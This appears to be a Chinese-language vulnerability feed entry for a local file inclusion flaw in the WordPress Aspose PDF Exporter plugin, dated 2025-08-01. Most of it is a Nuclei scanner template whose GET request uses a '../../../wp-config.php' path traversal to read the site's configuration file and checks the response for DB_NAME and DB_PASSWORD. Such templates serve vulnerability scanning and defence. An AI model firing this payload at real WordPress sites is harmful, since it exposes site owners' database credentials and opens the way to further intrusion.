aspose-pdf-file-download: WordPress Aspose PDF Exporter - Local File Inclusion

日期: 2025-08-01 | 影响软件: WordPress Aspose PDF Exporter | POC: 已公开

漏洞描述

WordPress Aspose PDF Exporter is vulnerable to local file inclusion.

PoC代码[已公开]

id: aspose-pdf-file-download

info:
  name: WordPress Aspose PDF Exporter - Local File Inclusion
  author: 0x_Akoko
  severity: high
  description: WordPress Aspose PDF Exporter is vulnerable to local file inclusion.
  reference:
    - https://packetstormsecurity.com/files/131161
    - https://wordpress.org/plugins/aspose-pdf-exporter
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 1
  tags: aspose,packetstorm,wordpress,wp-plugin,lfi,vuln

http:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/Wordpress/Aaspose-pdf-exporter/aspose_pdf_exporter_download.php?file=../../../wp-config.php'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "DB_NAME"
          - "DB_PASSWORD"
        part: body
        condition: and

      - type: status
        status:
          - 200
# digest: 490a0046304402206485802383cff145612f678292c9d9338ff14a9f4219006f697f9f8777a98966022055c637d4edac74b07c6f30793836d5afc1017f68fed0a3990a72382548e8db85:922c64590222798bb761d5b6d8e72950

相关漏洞推荐